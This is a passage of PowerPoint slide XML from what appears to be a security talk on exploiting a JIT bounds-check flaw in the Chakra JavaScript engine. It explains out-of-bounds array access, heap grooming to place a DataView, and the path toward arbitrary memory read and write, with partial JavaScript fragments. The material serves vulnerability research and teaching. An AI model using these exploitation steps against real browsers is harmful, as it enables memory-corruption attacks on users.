          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=0;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr.length;i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jit_read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (0x10000))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1889604" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1889604" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>target=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1889604" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>break</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1889604" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC89AD2-8E21-4AE7-8E1E-D615084CE706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5552978" y="8220006"/>
            <a:ext cx="6478602" cy="538113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCD43FF9-1F9D-4A23-81A6-1C2DBB4D63F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5552978" y="5282713"/>
            <a:ext cx="6478602" cy="502711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED70333A-2699-4CF0-8278-6E4B9F8DB8EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5552978" y="2550693"/>
            <a:ext cx="6478602" cy="2473882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For an array of integers that have not been modified, accessing 0x10000 will result in an exception. In the function Js::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavascriptOperators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OP_GetElementI_ArrayFastPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;Js::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavascriptNativeIntArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;, the length and index of the integer array are compared. If it is greater than or equal, the access fails.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98CB5B2A-E639-44DA-95E6-A0EDED7E5B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5552978" y="6049343"/>
            <a:ext cx="6478602" cy="2133661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is the index of the element, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to an array of integers. If it is greater than or equal to the access, the access fails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, in JIT mode, the optimized function will no longer compare the length of the integer array, but directly compare the size of the segment.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F88C63B-6266-4EB8-9302-3FC1360CCFEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5552978" y="8819433"/>
            <a:ext cx="6478602" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to segment, r13d is the index of the element</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47203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2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C77C784-82B0-4A19-8ABF-1B63C191B6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="3519994"/>
            <a:ext cx="10953455" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Through the previous steps, we have an integer array object with a very long length and size that can be read and written across the boundary, and can be indexed to other segment and integer array objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before implementing arbitrary address reading and writing, we need to be able to control an object that is read or written by an absolute address, such as a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object or a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291746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2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C77C784-82B0-4A19-8ABF-1B63C191B6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061632" y="2550693"/>
            <a:ext cx="10953455" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Take the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object as an example. How to control the object?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considering that the integer array object and the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object size are both 0x40, then can consider using the “dig hole” method to make the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object occupy the place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release one for every two integer array object, and then allocates a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object, then the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object may be allocated in the “hole”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If increase the number of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object allocations, the chance of hitting will increase, and finally an integer array and then a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will be formed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1095210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2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C77C784-82B0-4A19-8ABF-1B63C191B6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061633" y="2550693"/>
            <a:ext cx="4752313" cy="6986528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=0;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr.length;i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
